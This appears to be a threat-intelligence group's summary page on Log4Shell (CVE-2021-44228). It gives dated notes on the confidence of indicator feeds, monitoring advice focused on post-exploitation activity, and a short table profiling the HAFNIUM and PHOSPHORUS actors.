Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell exploit targeting CVE-2021-44228 in Log4j
- 2021-12-13
- IOCs shared by these feeds are
LOW-TO-MEDIUM CONFIDENCE
we strongly recommendNOT
adding them to a blocklist - These could potentially be used for
THREAT HUNTING
and could be added to aWATCHLIST
- Curated Intel members at various organisations recommend to
FOCUS ON POST-EXPLOITATION ACTIVITY
by threats leveraging Log4Shell (ex. threat actors, botnets) - IOCs include JNDI requests (LDAP, but also DNS and RMI), cryptominers, DDoS bots, as well as Meterpreter or Cobalt Strike
- Critical IOCs to monitor also include attacks using DNS-based exfiltration of environment variables (e.g. keys or tokens) - see here
- IOCs shared by these feeds are
- 2021-12-14
- Curated Intel members profiled active exploitation threats
- 2021-12-15
- Curated Intel members parsed
MEDIUM CONFIDENCE FEEDS
to beMISP COMPATIBLE
using KPMG's MISP implementation - Curated Intel members profiled active threat groups (nation states and organized crime)
- Curated Intel members parsed
- 2021-12-16
- Curated Intel members confirmed the previously unnamed "New Ransomware" is actually "TellYouThePass Ransomware", mostly targeting Chinese infrastructure
Grouping | Actor | Mentioned Alias | Other Alias EternalLiberty.csv | Threat Report | Note |
---|---|---|---|---|---|
Nation State | China | HAFNIUM | N/A | MSTIC (2) | Attacking infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems. |
Organized Crime | Iran | PHOSPHORUS | APT35, TEMP.Beanie, TA 453, NewsBeef, CharmingKitten, G0003, CobaltIllusion, TG-2889, Timberworm, C-Major, Group 41, Tarh Andishan, Magic Hound, Newscaster | MSTIC (2) | Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. |